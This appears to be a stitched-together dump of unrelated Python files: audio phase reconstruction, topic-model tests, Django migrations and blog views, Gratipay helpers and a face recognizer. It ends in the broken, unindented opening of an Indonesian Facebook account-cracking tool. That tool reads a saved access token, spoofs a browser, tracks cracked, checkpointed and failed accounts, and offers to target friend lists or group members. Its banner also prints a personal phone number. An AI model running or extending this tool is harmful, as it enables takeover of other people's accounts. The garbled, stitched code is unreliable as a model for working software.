        # full FFT size implied by the number of positive-frequency bins
        fft_size = 2 * (X.shape[1] - 1)

    # the optimal GL synthesis window matching the analysis window
    synthesis_window = compute_synthesis_window(analysis_window, hop)

    # create the STFT object
    engine = STFT(
        fft_size,
        hop=hop,
        analysis_window=analysis_window,
        synthesis_window=synthesis_window,
        **stft_kwargs
    )

    # Initialize the signal from the magnitude and the chosen phase
    Y = X * ini
    y = engine.synthesis(Y)

    # the successive application of analysis/synthesis introduces
    # a shift of ``fft_size - hop`` that we must correct
    the_shift = fft_size - hop
    y[:-the_shift,] = y[the_shift:,]

    for epoch in range(n_iter):
        # possibly monitor the reconstruction
        if callback is not None:
            callback(epoch, Y, y)

        # back to STFT domain
        Y[:, :] = engine.analysis(y)

        # enforce the known magnitudes, keeping only the estimated phase
        # NOTE(review): divides by |Y|; an exactly-zero bin would produce
        # NaN/inf — left unchanged here to preserve the original numerics.
        Y *= X / np.abs(Y)

        # back to time domain, with the same shift correction
        y[:-the_shift,] = engine.synthesis(Y)[the_shift:,]

    # last callback
    if callback is not None:
        callback(epoch, Y, y)

    return y
|
# -*- coding: utf-8 -*-
import os
import unittest
import numpy as np
from pola.machine.topic_model import Document
from pola.machine.topic_model import GTopicModel
from pola.machine.topic_model import resource as rs
class TestGTopicModel(unittest.TestCase):
    """Integration-style tests for GTopicModel on a tiny English lyric corpus."""

    def test_model(self):
        # Train and print perplexity plus the discovered topics for inspection.
        model = self.create_test_model()
        model.train(iter=10000)
        print(model.perplexity())
        for t in model.core.print_topics():
            print(t)

    def test_save_and_load_model(self):
        # Perplexity must survive a save/load round trip.
        pre_model = self.create_test_model()
        pre_model.train(iter=10000)
        p1 = pre_model.perplexity()
        pre_model.save()
        r = self.get_resource()
        post_model = GTopicModel.load(r.path)
        p2 = post_model.perplexity()
        # Fix: compare the absolute difference — the previous ``(p1 - p2) < 1e-5``
        # passed whenever p2 exceeded p1, regardless of how far apart they were.
        self.assertTrue(abs(p1 - p2) < 1e-5)

    def test_calc_distances(self):
        model = self.create_test_model()
        model.train()
        ds = model.calc_distances(0)
        # Fix: the previous ``assertTrue(2, len(ds))`` only checked that 2 is
        # truthy (len(ds) was the message argument) and could never fail.
        self.assertEqual(2, len(ds))
        print(ds)

    def test_get_doc_indices(self):
        model = self.create_test_model()
        model.train()
        print(model.get_topic_documents(0))

    def get_doc_en(self):
        # Six short lyric snippets form the toy English corpus.
        docs = [
            "I read the news today oh boy About a lucky man who made the grade",
            "I saw a film today oh boy The English Army had just won the war",
            "It’s been a hard days night, and I been working like a dog",
            "It’s been a hard days night, I should be sleeping like a dog",
            "You say you want a revolution",
            "You tell me that it's evolution"
        ]
        doc = Document.load_docs(docs, lang="en")
        return doc

    def create_test_model(self):
        # Build a fresh 3-topic model backed by a clean (removed) resource file.
        r = self.get_resource()
        r.remove()
        doc = self.get_doc_en()
        model = GTopicModel(3, doc, resource=r)
        return model

    def get_resource(self):
        # Resource path is resolved relative to this test module.
        base = os.path.dirname(__file__)
        path = os.path.join(base, "../data/test_gmodel.gensim")
        return rs.GensimResource(path)
|
# Generated by Django 2.2.4 on 2021-02-26 18:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the Book model with uploader and likers relations to User."""

    dependencies = [
        ('registration_app', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=255)),
                ('desc', models.TextField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                # Many-to-many: users who liked the book.
                ('likers', models.ManyToManyField(related_name='favoritebooks', to='registration_app.User')),
                # One uploader per book; deleting the user deletes their books.
                ('uploader', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='uploadedbooks', to='registration_app.User')),
            ],
        ),
    ]
|
# encoding: utf8
from __future__ import absolute_import, division, print_function, unicode_literals
import fnmatch
import random
import os
import re
from base64 import urlsafe_b64encode, urlsafe_b64decode
from datetime import datetime, timedelta
from aspen import Response, json
from aspen.utils import to_rfc822, utcnow
from postgres.cursors import SimpleCursorBase
import gratipay
BEGINNING_OF_EPOCH = to_rfc822(datetime(1970, 1, 1)).encode('ascii')
# Difference between current time and credit card expiring date when
# card is considered as expiring
EXPIRING_DELTA = timedelta(days = 30)
_email_re = re.compile(r'^[^@]+@[^@]+\.[^@]+$')
# exactly one @, and at least one . after @ -- simple validation, send to be sure
def is_valid_email_address(email_address):
    """Return True if *email_address* is short enough and loosely email-shaped.

    Validation is deliberately simple (one '@' with a '.' somewhere after);
    the authoritative check is actually sending mail to the address.
    """
    # Return a real bool: previously this leaked the regex match object
    # (or False) to callers.
    return len(email_address) < 255 and _email_re.match(email_address) is not None
def dict_to_querystring(mapping):
    """Serialize {key: [values]} into a '?k=v&k=v2' querystring.

    Returns an empty string for an empty/None mapping. Values are assumed
    to already be URL-safe; no escaping is performed.
    """
    if not mapping:
        return u''
    arguments = []
    # .items() instead of the Python-2-only .iteritems() so this helper
    # also runs under Python 3; iteration semantics are identical.
    for key, values in mapping.items():
        for val in values:
            arguments.append(u'='.join([key, val]))
    return u'?' + u'&'.join(arguments)
def _munge(website, request, url_prefix, fs_prefix):
    """Given website and requests objects along with URL and filesystem
    prefixes, redirect or modify the request. The idea here is that sometimes
    for various reasons the dispatcher can't handle a mapping, so this is a
    hack to rewrite the URL to help the dispatcher map to the filesystem.
    If you access the filesystem version directly through the web, we redirect
    you to the URL version. If you access the URL version as desired, then we
    rewrite so we can find it on the filesystem.
    """
    if request.path.raw.startswith(fs_prefix):
        # Filesystem-style path requested over the web: bounce to the
        # canonical URL form, preserving any querystring.
        to = url_prefix + request.path.raw[len(fs_prefix):]
        if request.qs.raw:
            to += '?' + request.qs.raw
        website.redirect(to)
    elif request.path.raw.startswith(url_prefix):
        # URL-style path: rewrite in place (re-init the path object) so
        # the dispatcher can resolve it on the filesystem.
        request.path.__init__(fs_prefix + request.path.raw[len(url_prefix):])
def use_tildes_for_participants(website, request):
    """Map '/~/username' filesystem paths onto '/~username' URLs (and back)."""
    return _munge(website, request, '/~', '/~/')
def canonicalize(redirect, path, base, canonical, given, arguments=None):
    """Redirect to the canonically-cased path when *given* differs from
    *canonical* (e.g. '/~/alice' -> '/~/Alice'), carrying *arguments*
    along as a querystring. No-op when the casing already matches.
    """
    if given != canonical:
        assert canonical.lower() == given.lower()  # sanity check
        remainder = path[len(base + given):]
        if arguments is not None:
            arguments = dict_to_querystring(arguments)
        # BUG FIX: the original `... + remainder + arguments or ''` (a) raised
        # TypeError when arguments was None and (b) applied `or ''` to the
        # whole concatenation due to operator precedence.
        newpath = base + canonical + remainder + (arguments or '')
        redirect(newpath)
def get_participant(state, restrict=True, resolve_unclaimed=True):
    """Given a Request, raise Response or return Participant.
    If restrict is True then we'll restrict access to owners and admins.

    Raises Response(401) for anonymous viewers when restricted, 404 for an
    unknown or archived participant, 410 for a closed one (unless admin),
    403 for a non-owner/non-admin when restricted. May redirect instead of
    returning (canonical casing, or stub-account resolution).
    """
    redirect = state['website'].redirect
    request = state['request']
    user = state['user']
    slug = request.line.uri.path['username']
    qs = request.line.uri.querystring
    _ = state['_']

    if restrict:
        if user.ANON:
            raise Response(401, _("You need to log in to access this page."))

    from gratipay.models.participant import Participant  # avoid circular import
    participant = Participant.from_username(slug)

    if participant is None:
        raise Response(404)

    # Redirect to the canonically-cased username if the URL casing differs.
    canonicalize(redirect, request.line.uri.path.raw, '/~/', participant.username, slug, qs)

    if participant.is_closed:
        # Closed accounts are visible to admins only.
        if user.ADMIN:
            return participant
        raise Response(410)

    if participant.claimed_time is None and resolve_unclaimed:
        to = participant.resolve_unclaimed()
        if to:
            # This is a stub account (someone on another platform who hasn't
            # actually registered with Gratipay yet)
            redirect(to)
        else:
            # This is an archived account (result of take_over)
            if user.ADMIN:
                return participant
            raise Response(404)

    if restrict:
        if participant != user.participant:
            if not user.ADMIN:
                raise Response(403, _("You are not authorized to access this page."))

    return participant
def encode_for_querystring(s):
    """Encode a unicode string into a querystring-safe ASCII token.

    Uses URL-safe base64 with '=' padding swapped for '~', since '=' is
    meaningful inside querystrings.
    """
    if not isinstance(s, unicode):
        raise TypeError('unicode required')
    encoded = urlsafe_b64encode(s.encode('utf8'))
    return encoded.replace(b'=', b'~').decode('ascii')
def decode_from_querystring(s, **kw):
    """Given a unicode computed by encode_for_querystring, return the inverse.

    We raise Response(400) if the input value can't be decoded (i.e., it's not
    ASCII, not padded properly, or not decodable as UTF-8 once Base64-decoded),
    unless a 'default' keyword was supplied, in which case it is returned.
    """
    if not isinstance(s, unicode):
        raise TypeError('unicode required')
    try:
        return urlsafe_b64decode(s.encode('ascii').replace(b'~', b'=')).decode('utf8')
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are
        # no longer swallowed; decode failures are still handled here.
        if 'default' in kw:
            # Enable callers to handle errors without using try/except.
            return kw['default']
        raise Response(400, "invalid input")
def _execute(this, sql, params=[]):
    # Debug shim installed by log_cursor: echo the SQL and params to stdout,
    # then delegate to the real SimpleCursorBase.execute.
    # NOTE(review): the mutable default `params=[]` is never mutated here so
    # it is harmless, but an immutable `()` would be safer.
    print(sql.strip(), params)
    super(SimpleCursorBase, this).execute(sql, params)
def log_cursor(f):
    """Decorator: print SQL and params to stdout while *f* runs.

    Works globally (it monkeypatches SimpleCursorBase.execute), so watch
    for threaded use.
    """
    from functools import wraps

    @wraps(f)  # preserve the wrapped function's name and docstring
    def wrapper(*a, **kw):
        try:
            SimpleCursorBase.execute = _execute
            ret = f(*a, **kw)
        finally:
            # Always restore, even if f raises.
            del SimpleCursorBase.execute
        return ret
    return wrapper
def format_money(money):
    """Format an amount: two decimals under 1000, whole units from 1000 up."""
    # Renamed local from `format` to avoid shadowing the builtin.
    fmt = '%.2f' if money < 1000 else '%.0f'
    return fmt % money
def truncate(text, target=160, append=' …'):
    """Shorten *text* to at most *target* characters, attaching *append*.

    The suffix is budgeted into the target, truncation prefers a clean
    word boundary, and text that already fits is returned untouched.
    """
    if len(text) <= target:  # already short enough
        return text
    if append:
        # Reserve room for the suffix, truncate without one, then attach it.
        return truncate(text, max(target - len(append), 0), '') + append
    head = text[:target]
    if not target or ' ' in (head[-1], text[target]):  # clean break
        return head.rstrip()
    return head.rsplit(' ', 1)[0]  # drop the trailing partial word
def is_card_expiring(expiration_year, expiration_month):
    """True when the card's expiry month starts within EXPIRING_DELTA of now (UTC)."""
    first_of_expiry_month = datetime(expiration_year, expiration_month, 1)
    time_left = first_of_expiry_month - datetime.utcnow()
    return time_left < EXPIRING_DELTA
def set_cookie(cookies, key, value, expires=None, httponly=True, path=b'/'):
    """Store *value* under *key* and set the usual cookie attributes.

    *expires* may be a timedelta (relative to now), a datetime, or an
    already-formatted RFC 822 byte string.
    """
    cookies[key] = value
    morsel = cookies[key]
    if expires:
        if isinstance(expires, timedelta):
            expires += utcnow()
        if isinstance(expires, datetime):
            expires = to_rfc822(expires).encode('ascii')
        morsel[b'expires'] = expires
    if httponly:
        morsel[b'httponly'] = True
    if path:
        morsel[b'path'] = path
    if gratipay.use_secure_cookies:
        morsel[b'secure'] = True
def erase_cookie(cookies, key, **kw):
    """Expire the cookie *key* by dating it back to the beginning of the epoch."""
    set_cookie(cookies, key, '', BEGINNING_OF_EPOCH, **kw)
def filter_profile_nav(user, participant, pages):
    """Return the subset of nav *pages* the viewing *user* may see.

    Each page is a 4-tuple whose last two flags say whether it is shown to
    the profile owner and to other visitors; admins see everything.
    """
    is_owner = user.participant == participant
    visible = []
    for page in pages:
        foo, bar, show_them, show_others = page
        if user.ADMIN or (show_them if is_owner else show_others):
            visible.append(page)
    return visible
def to_javascript(obj):
    """Serialize *obj* for safe inlining inside a <script> tag.

    '</' is escaped so a string value cannot close the script element early.
    """
    serialized = json.dumps(obj)
    return serialized.replace('</', '<\\/')
def get_featured_projects(db):
    """Pick up to ten approved, open teams to feature, shuffled, aiming for
    roughly a 70/30 mix of popular (more than five funders) vs unpopular."""
    # Count eligible teams on each side of the popularity cutoff.
    npopular, nunpopular = db.one("""
        WITH eligible_teams AS (
            SELECT *
              FROM teams
             WHERE not is_closed
               AND is_approved
        )
        SELECT (SELECT COUNT(1)
                  FROM eligible_teams
                 WHERE nreceiving_from > 5) AS npopular,
               (SELECT COUNT(1)
                  FROM eligible_teams
                 WHERE nreceiving_from <= 5) AS nunpopular
    """, back_as=tuple)

    # Attempt to maintain a 70-30 ratio
    if npopular >= 7:
        npopular = max(7, 10-nunpopular)
    # Fill in the rest with unpopular
    nunpopular = min(nunpopular, 10-npopular)

    # Sample each bucket at random, sized by the quotas computed above.
    featured_projects = db.all("""
        WITH eligible_teams AS (
            SELECT *
              FROM teams
             WHERE not is_closed
               AND is_approved
        )
        (SELECT t.*::teams
           FROM eligible_teams t
          WHERE nreceiving_from > 5
       ORDER BY random()
          LIMIT %(npopular)s)
      UNION
        (SELECT t.*::teams
           FROM eligible_teams t
          WHERE nreceiving_from <= 5
       ORDER BY random()
          LIMIT %(nunpopular)s)
    """, locals())
    random.shuffle(featured_projects)
    return featured_projects
def set_version_header(response, website):
    """Stamp the running Gratipay version onto the response headers."""
    response.headers['X-Gratipay-Version'] = website.version
def find_files(directory, pattern):
    """Yield paths beneath *directory* whose basename matches glob *pattern*."""
    for dirpath, _dirnames, filenames in os.walk(directory):
        for name in fnmatch.filter(filenames, pattern):
            yield os.path.join(dirpath, name)
|
''' module face_recognizer.py
Purpose: identify a face
'''
import time
from enum import Enum
from numpy import load, expand_dims, asarray, dot, transpose, sqrt, linalg, array as np_array
from sklearn.preprocessing import LabelEncoder, Normalizer
from sklearn.svm import SVC
from utils import LEARNED_FACE_EMBEDDINGS_OUTPUT_FILE, \
PRINT_PERFORMANCE_INFO, \
is_ubuntu_64, \
is_coral_dev_board
from face_embedding_engine import FaceEmbeddingEngine
# We use descriptive variable and function names so
# disable the pylint warning for long lines
# pylint: disable=line-too-long
class MatchDistanceCalculationMethodEnum(Enum):
    ''' enum MatchDistanceCalculationMethodEnum
    Enumerates all methods supported for calculating the distance
    between the embedding of an unknown face and the embedding(s)
    of a known face.

    The active method is selected via the module-level
    MATCH_CALCULATION_METHOD constant.
    '''
    COSINE_MEAN = 1 # Calculate mean of 'matched' trained embeddings and then measure angular distance from that to the face embedding
    LINEAR_NORMALIZED_MEAN = 2 # Calculate mean of 'matched' trained embeddings and then measure linear distance from that to the face embedding
    MEAN_LINEAR_NORMALIZED = 3 # Measure linear distance between face embedding and each 'matched' trained embedding then calculate mean of that
# Distance method used throughout this module, and the minimum SVC match
# probability (percent) before a candidate is even considered.
MATCH_CALCULATION_METHOD = MatchDistanceCalculationMethodEnum.COSINE_MEAN
# NOTE(review): constant name is missing an 'I' ("IDENTIFCATION"); renaming
# would touch call sites, so it is only flagged here.
IDENTIFCATION_PROBABILITY_THRESHOLD = 80 # percent
class FaceRecognizer():
    ''' class FaceRecognizer
    Purpose: identify images of faces
    '''

    def __init__(self, embedding_model):
        ''' function constructor
        Constructor for FaceRecognizer
        Args:
            embedding_model (FaceEmbeddingModelEnum): The model to use for generating
                embeddings for face images
        Returns:
            None
        '''
        # Observed distances differed between Ubuntu and Coral dev board
        if MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.COSINE_MEAN:
            if is_ubuntu_64:
                self.matched_distance_threshold = .6
            elif is_coral_dev_board:
                self.matched_distance_threshold = .4
            else:
                raise Exception("Unsupported platform")
        elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.LINEAR_NORMALIZED_MEAN:
            if is_ubuntu_64:
                self.matched_distance_threshold = 12
            elif is_coral_dev_board:
                self.matched_distance_threshold = 8
            else:
                raise Exception("Unsupported platform")
        # NOTE(review): MEAN_LINEAR_NORMALIZED sets no matched_distance_threshold
        # above, so get_name_for_face would raise AttributeError under that
        # method -- confirm whether it is meant to be supported.
        # load face embeddings for 'learned' faces
        data = load(LEARNED_FACE_EMBEDDINGS_OUTPUT_FILE)
        training_embeddings, training_labels, validation_embeddings, validation_labels = data['arr_0'], data['arr_1'], data['arr_2'], data['arr_3']
        # group embeddings by label for future comparison
        self.trained_embedding_lists = {}
        trained_labels = []
        for index, label in enumerate(training_labels):
            if label not in self.trained_embedding_lists:
                self.trained_embedding_lists[label] = []
                trained_labels.append(label)
            self.trained_embedding_lists[label].append(training_embeddings[index])
        # calculate mean value of all embeddings for each label
        self.trained_embedding_mean_values = {}
        for label in trained_labels:
            mean_value_for_embeddings = np_array(self.trained_embedding_lists[label]).mean(axis=0)
            self.trained_embedding_mean_values[label] = mean_value_for_embeddings
        # normalize input vectors
        in_encoder = Normalizer(norm='l2')
        training_embeddings = in_encoder.transform(training_embeddings)
        validation_embeddings = in_encoder.transform(validation_embeddings)
        # label encode targets
        self.out_encoder = LabelEncoder()
        self.out_encoder.fit(training_labels)
        training_labels = self.out_encoder.transform(training_labels)
        validation_labels = self.out_encoder.transform(validation_labels)
        # fit classifying model
        self.classifying_model = SVC(kernel='linear', probability=True)
        self.classifying_model.fit(training_embeddings, training_labels)
        # load the FaceNet model to generate face embeddings with
        self.embedding_engine = FaceEmbeddingEngine(embedding_model)

    def get_name_for_face(self, face_image):
        ''' function get_name_for_face
        Given an image of a face, generate an embedding for it and
        try to identify it. Use the SVC model to identify the most
        likely candidate then compare the embedding to the mean
        value of the candidate's embeddings by determining the 'distance'
        between the two. If the distance is within a certain threshold
        then the candidate is considered a match.
        Args:
            face_model (PIL Image): The image of the face to try to
                identify. The dimensions of the image must
                match the dimensions required by the selected
                embedding model.
        Returns:
            If a match is found, return the string name of the match,
            otherwise return an empty string
            (plus the elapsed embedding + classification time, in seconds)
        '''
        start_time = time.monotonic()
        # get an embedding for the face image
        face_embedding = self.embedding_engine.get_embedding(asarray(face_image))
        generate_embedding_time = time.monotonic() - start_time
        if PRINT_PERFORMANCE_INFO:
            print("Generate embedding time: {:.3f}s".format(generate_embedding_time))
        start_time = time.monotonic()
        # run the embedding through classifier to see if we
        # can identify the face from the embedding
        sample = expand_dims(face_embedding, axis=0)
        yhat_class = self.classifying_model.predict(sample)
        yhat_prob = self.classifying_model.predict_proba(sample)
        # get name (AKA the class 'label')
        class_index = yhat_class[0] # only care about the top match
        class_probability = yhat_prob[0, class_index] * 100
        class_label = self.out_encoder.inverse_transform(yhat_class)[0]
        # The SVC model returns match probababilities to all 'known' faces
        # so it always returns results (and the total probability always
        # equals 100%). So take the top 'match' and calculate the 'distance'
        # to the face embedding we're examining. If the distance is within
        # a certain threshold then the match is considered a true match.
        name_for_face = ""
        if class_probability > IDENTIFCATION_PROBABILITY_THRESHOLD:
            if MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.COSINE_MEAN:
                matched_embedding = self.trained_embedding_mean_values[class_label]
                matched_distance = find_cosine_distance(matched_embedding, face_embedding)
            elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.LINEAR_NORMALIZED_MEAN:
                # NOTE(review): despite the enum's description, only the FIRST
                # trained embedding for the label is used here ([0]), and
                # .mean() is then applied to a scalar norm -- confirm intent.
                matched_embeddings = self.trained_embedding_lists[class_label][0]
                matched_distance = linalg.norm(matched_embeddings - face_embedding).mean()
            elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.MEAN_LINEAR_NORMALIZED:
                linear_distances = linalg.norm(np_array(self.trained_embedding_lists[class_label]) - face_embedding, axis=1)
                matched_distance = linear_distances.mean()
            print("distance from {} ({:.1f}% SVC match) = {:.1f}".format(class_label, class_probability, matched_distance))
            if matched_distance <= self.matched_distance_threshold:
                name_for_face = class_label+" ("+'{:d}%'.format(int(class_probability))+")"
        classify_embedding_time = time.monotonic() - start_time
        if PRINT_PERFORMANCE_INFO:
            print("Classify embedding: {:.3f}s".format(classify_embedding_time))
        return name_for_face, (generate_embedding_time + classify_embedding_time)
def find_cosine_distance(face_embedding_1, face_embedding_2):
    ''' function find_cosine_distance
    Given two face embeddings, calculate the cosine distance
    (1 - cosine similarity) between the two.
    Args:
        face_embedding_1 (embedding): embedding for face 1
        face_embedding_2 (embedding): embedding for face 2
    Returns:
        Cosine distance between the two face embeddings
    '''
    similarity_numerator = dot(transpose(face_embedding_1), face_embedding_2)
    norm_sq_1 = dot(transpose(face_embedding_1), face_embedding_1)
    norm_sq_2 = dot(transpose(face_embedding_2), face_embedding_2)
    return 1 - (similarity_numerator / (sqrt(norm_sq_1) * sqrt(norm_sq_2)))
|
# Generated by Django 3.0.6 on 2020-10-12 17:09
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: make Brand.test a nullable IntegerField."""

    dependencies = [
        ('store', '0004_auto_20201012_2008'),
    ]

    operations = [
        migrations.AlterField(
            model_name='brand',
            name='test',
            field=models.IntegerField(null=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
import pytest
from lib import ttbjson
def test_constructor():
    """Defaults are sane, and header/version setters reject wrong types."""
    obj = ttbjson.TwoTribesBinaryJSON()
    assert obj.header == 'BJSON'
    assert obj.version == 1
    assert obj.data is None
    with pytest.raises(TypeError, match=r'^header must be str$'):
        obj.header = b'test'
    with pytest.raises(TypeError, match=r'^version must be int$'):
        obj.version = 'test'
|
# coding=utf-8
#
import unittest2
from itertools import takewhile, count
from py_functional_learning.list_problems import head, tail, numElements \
, firstNelements, elementAt, reverse
class TestList(unittest2.TestCase):
    """Tests for the functional list helpers (head, tail, numElements,
    firstNelements, elementAt, reverse). Several cases deliberately feed
    lazy iterators (filter, count) to check the helpers don't need len()."""

    def __init__(self, *args, **kwargs):
        super(TestList, self).__init__(*args, **kwargs)

    def testHead(self):
        self.assertEqual('a', head(['a']))
        self.assertEqual(1, head(range(1, 100)))
        self.assertEqual('a', head(['a', 'b']))
        self.assertEqual(3, head(filter(lambda x: x > 2, range(8))))
        self.assertEqual(0, head(count())) # infinite list

    def testHeadError(self):
        # head of an empty list must raise ValueError.
        try:
            head([])
        except ValueError:
            pass # expected
        else:
            self.fail('something goes wrong')

    def testTail(self):
        # NOTE(review): per these expectations, tail() returns the LAST
        # element, not the list-minus-head.
        self.assertEqual('a', tail(['a']))
        self.assertEqual('b', tail(['a', 'b']))
        self.assertEqual(6, tail(filter(lambda x: x < 7, range(100))))

    def testTailError(self):
        try:
            tail([])
        except ValueError:
            pass # expected
        else:
            self.fail('something goes wrong')

    def testNumElements(self):
        self.assertEqual(0, numElements([]))
        self.assertEqual(0, numElements(filter(lambda x: x > 5, range(4))))
        self.assertEqual(1, numElements(['a']))
        self.assertEqual(5, numElements('abcde'))

    def testFirstNelements(self):
        # Asking for more elements than exist yields what is available.
        self.assertEqual([], list(firstNelements([], 2)))
        self.assertEqual([1], list(firstNelements([1], 2)))
        self.assertEqual([0, 1], list(firstNelements(range(5), 2)))
        self.assertEqual(['a'], list(firstNelements('abc', 1)))
        self.assertEqual([0, 1, 2], list(firstNelements(count(), 3)))

    def testElementAt(self):
        # NOTE(review): elementAt is 1-indexed per these expectations.
        self.assertEqual('a', elementAt('abc', 1))
        self.assertEqual(2, elementAt(range(3), 3))
        self.assertEqual(5, elementAt(count(1), 5)) # infinite list

    def testElementAtError(self):
        try:
            elementAt([], 1)
        except ValueError:
            pass # expected
        else:
            self.fail('something goes wrong')
        try:
            elementAt([1, 2], 3)
        except ValueError:
            pass # expected
        else:
            self.fail('something goes wrong')

    def testReverse(self):
        self.assertEqual([], reverse([]))
        self.assertEqual('a', reverse('a'))
        self.assertEqual('ab c', reverse('c ba'))
        self.assertEqual([3, 2, 1]
                         , reverse(takewhile(lambda x: x < 4, count(1))))
from django.contrib import messages
from django.core.paginator import Paginator
from django.shortcuts import render, redirect
from .models import Contact, post, Catagory, BlogComment
from django.http import HttpResponse
from shop.models import MyProfile
from blog.templatetags import extras
from .serializers import postSerializer
from rest_framework.renderers import JSONRenderer
def index(request):
    """Blog home: accepted posts paginated two per page, plus the three
    latest posts and all categories for the sidebar."""
    accepted = post.acceptpost.all().order_by('-post_id')
    recent = post.acceptpost.filter().order_by('-post_id')[0:3]
    categories = Catagory.objects.all()
    page_obj = Paginator(accepted, 2).get_page(request.GET.get('page'))
    context = {'data': page_obj, 'data1': recent, 'catag': categories}
    return render(request, 'blog/home.html', context)
def post_detail(request, id):
    """Single-post page: the post, recent posts, categories, and its
    comments threaded as {parent sno: [replies]}."""
    current = post.objects.get(post_id=id)
    recent = post.objects.filter().order_by('-post_id')[0:3]
    categories = Catagory.objects.all()
    top_level = BlogComment.objects.filter(post=current, parent=None)
    replies = BlogComment.objects.filter(post=current).exclude(parent=None)
    # Bucket replies under their parent comment's sno for the template.
    replyDict = {}
    for reply in replies:
        replyDict.setdefault(reply.parent.sno, []).append(reply)
    context = {'i': current, 'data1': recent, 'catag': categories,
               'comments': top_level, 'user': request.user,
               'replyDict': replyDict}
    return render(request, 'blog/blog-details.html', context)
def post_Search(request):
    """Search posts by title, author username, or content; warn when the
    combined result set is empty."""
    d = ""
    if request.method == "POST":
        query = request.POST['query']
        by_title = post.objects.filter(title__icontains=query)
        by_author = post.objects.filter(author__username__contains=query)
        by_content = post.objects.filter(content__icontains=query)
        data = by_title.union(by_author, by_content)
        # BUG FIX: `data.count == 0` compared the bound method object to 0
        # and was always False, so the empty-result warning never showed.
        if data.count() == 0:
            messages.warning(request, "no result can be found please refine your query")
        d = {'data': data}
    return render(request, 'blog/search.html', d)
def about(request):
    """Render the static about page."""
    return render(request, 'about.html')
def contact(request):
    """Contact form: persist a Contact record on POST, then render the page.

    Leftover debug prints of the submitted name were removed.
    """
    if request.method == "POST":
        entry = Contact(
            name=request.POST['name'],
            email=request.POST['email'],
            phone=request.POST['phone'],
            content=request.POST['content'],
        )
        entry.save()
    return render(request, 'contractus.html')
def postComment(request):
    """Create a comment (or a reply when 'parentSno' is posted) on a post,
    then redirect back to that post's detail page.

    Only handles POST; other methods fall through and return None, as before.
    """
    if request.method == "POST":
        text = request.POST.get('comment')
        profile = MyProfile.objects.get(user=request.user)
        postSno = request.POST.get('postSno')
        parentSno = request.POST.get('parentSno')
        postx = post.objects.get(post_id=postSno)
        if parentSno is None:  # identity check, not `== None` (idiom fix)
            BlogComment(comment=text, user=profile, post=postx).save()
            messages.success(request, "Your comment has been posted successfully")
        else:
            parent = BlogComment.objects.get(sno=parentSno)
            BlogComment(comment=text, user=profile, post=postx, parent=parent).save()
            messages.success(request, "Your reply has been posted successfully")
        return redirect(f"display-post/{postx.post_id}/")
def postsdetail(request):
    """Return every post serialized as a JSON HTTP response.

    Leftover debug print of the payload was removed.
    """
    posts = post.objects.all()
    serializer = postSerializer(posts, many=True)
    json_data = JSONRenderer().render(serializer.data)
    return HttpResponse(json_data, content_type='application/json')
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
    # Exit helper ("keluar" = Indonesian for "exit"): print a notice and quit.
    print '\x1b[1;91m[!] Keluar'
    os.sys.exit()
def jalan(z):
    # Typewriter effect: echo *z* one character at a time, 0.1 s apart,
    # ending with a newline.
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.1)
def tik():
    # Simple "Loading ..." spinner: three dot frames, one second apart.
    titik = [
        '. ', '.. ', '... ']
    for o in titik:
        print '\r\x1b[1;91m[+] \x1b[1;92m[ Loading ] \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
normal = "\033[0;37;40m" #normal
miring = "\033[3;37;40m" #miring
#text warna
abu = "\033[1;30;40m" #abu abu
merah = "\033[1;31;40m" #merah
hijau = "\033[1;32;40m" #hijau
kuning = "\033[1;33;40m" #kuning
biru = "\033[1;34;40m" #biru
pink = "\033[1;35;40m" #pink
birumuda = "\033[1;36;40m" #birumuda
putih = "\033[1;37;40m" #putih
r = "\033[91m"
y = "\033[93m"
print
print putih+" ["+kuning+" Tool - Facebook "+putih+"]"
print putih+" ( ) > Termux "
print putih+" ( ) "+merah+"?????????????????????????????????"
print putih+" ( ) "+merah+"??"+kuning+" Author : Mr. Achmad "+hijau+"?? "
print putih+" _( )_ "+merah+"??"+kuning+" Contact WA : 085608035292 "+hijau+"??"
print putih+" [ INDONESIA ] "+hijau+"?????????????????????????????????"+normal
print "____________________________________________________________________"
print "_____________________"+biru+"Selamat_Datang_ya_Bangsat"+putih+"______________________"
print
def super():
global toket
os.system('reset')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print '\x1b[1;37;40m[1] Daftar Teman'
print '\x1b[1;37;40m[2] Member Grup'
print(y+pm)
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('reset')
jalan('\x1b[1;91m[+] [ selamat datang bangsat ] \x1b[1;97m...')
